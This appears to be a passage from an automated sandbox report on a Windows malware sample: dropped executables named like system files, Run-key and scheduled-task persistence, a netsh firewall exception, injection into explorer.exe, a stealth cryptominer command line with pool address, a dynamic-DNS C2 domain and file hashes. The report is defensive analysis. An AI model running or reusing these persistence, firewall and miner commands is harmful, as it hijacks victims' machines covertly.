| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svhost.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lear.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\services32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2424 set thread context of 4072 | N/A | C:\Users\Admin\AppData\Local\Temp\services64.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe
"C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe"
C:\Users\Admin\AppData\Local\Temp\lear.exe
"C:\Users\Admin\AppData\Local\Temp\lear.exe"
C:\Users\Admin\AppData\Local\Temp\svhost.exe
"C:\Users\Admin\AppData\Local\Temp\svhost.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe"
C:\Users\Admin\AppData\Local\Temp\services32.exe
"C:\Users\Admin\AppData\Local\Temp\services32.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Local\Temp\services64.exe
"C:\Users\Admin\AppData\Local\Temp\services64.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=vlas --pass=a=randomx --cpu-max-threads-hint=40 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv kJYy6oQToUmTHYGhxZtTsw.0.2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 104.21.10.32:3359 | tcp | |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| GB | 88.221.134.18:80 | tcp | |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 104.21.10.32:3359 | tcp | |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 104.21.10.32:3359 | tcp | |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 104.21.10.32:3359 | tcp | |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 172.67.189.225:3359 | tcp | |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 172.67.189.225:3359 | tcp | |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
memory/3200-0-0x0000000000AA0000-0x0000000000DB8000-memory.dmp
memory/3200-3-0x000000001BA30000-0x000000001BA40000-memory.dmp
memory/3200-2-0x000000001BA30000-0x000000001BA40000-memory.dmp
memory/3200-1-0x00007FFE4BE60000-0x00007FFE4C921000-memory.dmp
memory/3200-4-0x000000001BA30000-0x000000001BA40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\lear.exe
| MD5 | 0bff36b53d94dbeba2ca37da0ee15631 |
| SHA1 | 4536eb13dd54de6b25d0de95272efd65eb70234c |
| SHA256 | 841b1aac0d31d294a7ee3a77946947e24ef8eba639c67b9004337b0689f28ac9 |
| SHA512 | 0fa04ec542b27d13fe9e45a7bca2094ad628c8e80a5466ec264fd85b54a56899dc23bd6898879af4919609b336e8b75965ba743326149959fdeec27a0fe4f668 |
C:\Users\Admin\AppData\Local\Temp\svhost.exe
| MD5 | 696f2e0facba8c9bc7e2269986bada95 |
| SHA1 | aaa3ce178ba47c0e370c3ca40b99654cf61d99dd |
| SHA256 | de781ab98b48f1d32a0eac30ab8e9f3d0de9d532db7720fd0a803f227abb039a |
| SHA512 | afa581a6e90aac8b6dc99fa15bfcf078d83af623bee1d79ed9f7578160d6651fa80f2deaf3b43d9a5082442cb82b9e5fd2c3d18d51d5f7cd52182115511baaeb |
C:\Users\Admin\AppData\Local\Temp\lear.exe
| MD5 | 95f767c722a38a1cefe083d99422a58d |
| SHA1 | 16eb39ae6079acbc7a9bbe88eb3ebbe85ade9cf8 |
| SHA256 | 157f6767a523fbbd1c304aa1b855c1e843b49d227cc4c7df702262b11c75bda1 |
| SHA512 | a56fb76657217691632f79295d85d845df35b45b0302727e2724413c508757bcb983ea6b87be5629368980929ae86035483c28c4c8266d545ecadfcc4d1a5944 |
memory/3200-71-0x00007FFE4BE60000-0x00007FFE4C921000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\lear.exe
| MD5 | 19b6f0bec5362333d1d87f4679208d72 |
| SHA1 | a4f6bdec95a45bd30c874c2a44a3222b948f966f |
| SHA256 | a0e550e73ffaba9fc8a24d91a14d17ed4402ac30dc90e5ac42625115d50cabdb |
| SHA512 | 18d3f8ec0269c06ee1f48ead949e852b726b7813cf5d4fa61497b0a01dae2f9b661f5ce5eb7122f11e346397f4fa92b2977ffe2542f92bb2e8d60f0772667b6f |
memory/1956-73-0x0000000074600000-0x0000000074BB1000-memory.dmp
memory/1956-74-0x0000000074600000-0x0000000074BB1000-memory.dmp
memory/1956-75-0x0000000001660000-0x0000000001670000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
| MD5 | 9ddac033ac79900f5ad182c557c328d1 |
| SHA1 | e7178202799f83f318a1083fb10910278ba1efe9 |
| SHA256 | 316af643b17f7f6f9a74775791d5603a2eba9b35fa758dda2f4d3b884e3839bd |
| SHA512 | eee3d87857d7bc6f45a88bf49aa05ec0fedd48f32ee7fae04f2e840a24e635b4340275093253cf1639194dc0277c5e0e9e5c06deb7178127bff6d1dcc5db53be |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
| MD5 | 43d590f88270ff8963d47a4a5161cd2c |
| SHA1 | 2ba74ac4fec486373c0ebe94bc75223ab2600490 |
| SHA256 | db25ed27bfdfde3b88b4a7483e15bdecc587f694e8dc2c1ca91325e1d5b4453a |
| SHA512 | 00a156c09c6d7e5dc25f89aecd4051a3d555aec268d313d328ea12ebb30a30a7d2d80a152e8b06bd477fe9fd01ee16ecbef62edf249b03fc59f0fd809b9934a0 |
memory/1020-90-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
| MD5 | 40640840746d6a6c57a2d75527df8991 |
| SHA1 | 13deceda20b587158231fa7613b78a77172f86ce |
| SHA256 | f05e99298ab69dd46226761dacb6933f03bbcb95f8bfb0238a578af15e187039 |
| SHA512 | 2e06df6a763cbef37f0bdabe15cae69ad90d5e0614617f875f249837241b8838a0ea0dd1a2a04d1b5ef5c522167811ee542da57d3aa09b2e5a07c9c223c041f3 |
memory/1020-92-0x00007FFE69970000-0x00007FFE69980000-memory.dmp
memory/1020-93-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp
memory/1020-95-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp
memory/1020-94-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/1020-96-0x00000000037C0000-0x00000000037CA000-memory.dmp
memory/1020-98-0x0000000003C50000-0x0000000003C60000-memory.dmp
memory/1020-97-0x0000000003C30000-0x0000000003C42000-memory.dmp
memory/4648-112-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\services32.exe
| MD5 | 25c8ed402887392f040d5df468f72c28 |
| SHA1 | d0ce1a4bc8146fd69b96253744160d684b5da285 |
| SHA256 | 5419970b47d0b6e6550db7feaa099928b2f903f4fdffa10a0ef5ffbf92e61576 |
| SHA512 | 865fc814f9314bec937773b0172a496b8c27e1fdbfc14418ae73d199eff4d89dad4d1d3615247b356b58bf440003f0df8bcce32b32f7032c0dd20cd93f4e17a4 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
| MD5 | 611f87f2772d9497a398a841060635b9 |
| SHA1 | 87f09e34188c36929a8711b007ffa985d31c7191 |
| SHA256 | 1cfe9df671ad4323ec6713fb0838592e2de707e1dadd93be8fede2addf541a3e |
| SHA512 | d2fd1ea8862690ee0458d8af38470547bb6bc38916a767f150ba4089de8c3776ebf9d0e4e5be35fb75c2af4e68528042cd975cf7541db881379394f07ca3e4b2 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
| MD5 | 9c648eeade4c8b324585f38247f40740 |
| SHA1 | f5c348717d3a76a370048c5a5195a303f0daaa07 |
| SHA256 | 46f961a91e90790ca245e819a60faf357aa8af518a05d7c22053032d67360f83 |
| SHA512 | 3bcd1e06b8e4616d582bd1f0211baaf6fc7a3028815ddbb7bc3ec262d5918826139758c3a355b1a044e0b6070db1fe360718ed82a9dbf9dcc46dfb34850112b4 |
memory/4912-126-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp
memory/4648-129-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/4648-130-0x00007FFE69970000-0x00007FFE69980000-memory.dmp
memory/4912-134-0x00007FFE69970000-0x00007FFE69980000-memory.dmp
memory/4912-135-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp
memory/4912-136-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/1956-133-0x0000000074600000-0x0000000074BB1000-memory.dmp
memory/4912-132-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp
memory/4648-128-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp
memory/4648-127-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
| MD5 | 50075fb9b3b6faae5c0184b3e69a891a |
| SHA1 | f0fd43ea6936473d6a39ee6edfb77c5365465ec5 |
| SHA256 | c64a0c0c1a706706a770e38716e14d340d469f26fbf00534545ef59c4a88ffa2 |
| SHA512 | 6e67ba375a6af58d0c86750fb165130e06235fc5c895ae9bbcf4a8e6b08717af1fad74624ba38ae5f3bccd67453bc6cbe82dcfba018d63d3f0b10b570a844b31 |
memory/1020-114-0x00007FF624DC0000-0x00007FF6253B4000-memory.dmp
memory/1020-113-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\services32.exe
| MD5 | ce128f070c0ee7cbd879ca932f6635b1 |
| SHA1 | 5cd7502bfaf0461b6c71f1e58639435ca9838eae |
| SHA256 | f45f3f008a7903e2b96e0d3c216d0dad3705ffe7a5f5cba4c2014e9c9363b3e2 |
| SHA512 | d0c68081d090de4ed1526e98236ebfa3064d9d64b3c110f69a096448409e1522f60ddeac3eff575a831568862a3e3178016c47ab1eb6265fe73b8b7183a8349a |
memory/4648-137-0x0000000004590000-0x00000000045A0000-memory.dmp
memory/3204-151-0x00000000003A0000-0x00000000003A6000-memory.dmp
memory/1956-152-0x0000000001660000-0x0000000001670000-memory.dmp
memory/4912-155-0x0000000003E80000-0x0000000003E90000-memory.dmp
memory/3204-156-0x000000001BE40000-0x000000001BE50000-memory.dmp
memory/3204-154-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/4912-153-0x0000000003410000-0x000000000341E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
| MD5 | 7f13e2b226baf92c8c7aa34606a33043 |
| SHA1 | 957594155513bcb9adf119fbd683d6222c97b6f7 |
| SHA256 | 82daa75486edff63daa1eb62220e8aaeea23691151ba98f9f3b8b87f51428e3d |
| SHA512 | a164fc7ecdd842fcedea61025fd8f9abe7c9efa06d08493be2413a052fa91e9c1818bbf006475b3f740174a0c7e6e474ee7f5fa2b703b4f164a8849d4dcc02a1 |
memory/3492-169-0x0000000001430000-0x0000000001440000-memory.dmp
memory/3492-168-0x0000000074600000-0x0000000074BB1000-memory.dmp
memory/1956-167-0x0000000074600000-0x0000000074BB1000-memory.dmp
memory/4648-173-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/4648-174-0x00007FF6FEF40000-0x00007FF6FF534000-memory.dmp
memory/2424-186-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp
memory/4912-188-0x00007FF67BDE0000-0x00007FF67C3D6000-memory.dmp
memory/4912-190-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/2424-194-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/2424-193-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp
memory/2424-192-0x00007FFE69970000-0x00007FFE69980000-memory.dmp
memory/2424-191-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\services64.exe
| MD5 | e1600c76646028abf588db4acbf5d6d8 |
| SHA1 | 33968a07ed3ba13704f723cf42f06d289a0bfdea |
| SHA256 | 87c0c43b47a5a17ae3df59343e8f2c12c48c2b30ef2c92c0a4d63176353533d2 |
| SHA512 | 64fe3c44c494eb5a1ba400a386d0426dedf2e6df86ae8a819354e7b57633940e693489e0ef8fea49c39d6ef060b8a32884a3dc3205fafc208e1bd19e91e3154f |
C:\Users\Admin\AppData\Local\Temp\services64.exe
| MD5 | 2bbec033125ea50257184b2656416fd4 |
| SHA1 | f6cfe41ea675edfd614c7d5809736540ebf5fff2 |
| SHA256 | 56b86287dea61cc557b726bc56024096ad21eb5821782933f35e78688a2d5109 |
| SHA512 | a048b9c9056ed7a1851153ae15db7ee5ce76d66b9e3c358d9641d3470eccfc0ef65322be0b49bfb34424b3d9f60dd994cc056f13d67069caca1336d06ca53a00 |
memory/2424-195-0x000000001D250000-0x000000001D260000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 16379e3af6a104ba50f80465c44297b3 |
| SHA1 | 23fa672955f7519aa8ab000977560fa952069052 |
| SHA256 | a37d2858b1c7aa02fc4ff57dd4c0f6822fa280c3fae16ca0d79d4df51db1ceae |
| SHA512 | 97a19c76e28214e5cff3bc0164edbb5f52f627a414a2e9008033b398549641d434aad8f97095399c994f7dfb372eb72bafbf706a31877cc2bb7dabb229d0db59 |
memory/4836-210-0x0000000000640000-0x0000000000646000-memory.dmp
memory/4836-211-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/4836-212-0x00000000032A0000-0x00000000032B0000-memory.dmp
memory/4072-216-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2424-220-0x00007FF70E590000-0x00007FF70EB86000-memory.dmp
memory/2424-222-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/4072-221-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-224-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-225-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-227-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-226-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-223-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-219-0x0000000001F20000-0x0000000001F40000-memory.dmp
memory/4072-218-0x0000000140000000-0x0000000140786000-memory.dmp
memory/4072-214-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3204-229-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/3204-230-0x000000001BE40000-0x000000001BE50000-memory.dmp
memory/3492-232-0x0000000001430000-0x0000000001440000-memory.dmp
memory/3492-231-0x0000000074600000-0x0000000074BB1000-memory.dmp
memory/4836-233-0x00007FFE4B100000-0x00007FFE4BBC1000-memory.dmp
memory/4836-234-0x00000000032A0000-0x00000000032B0000-memory.dmp
memory/4072-235-0x0000000140000000-0x0000000140786000-memory.dmp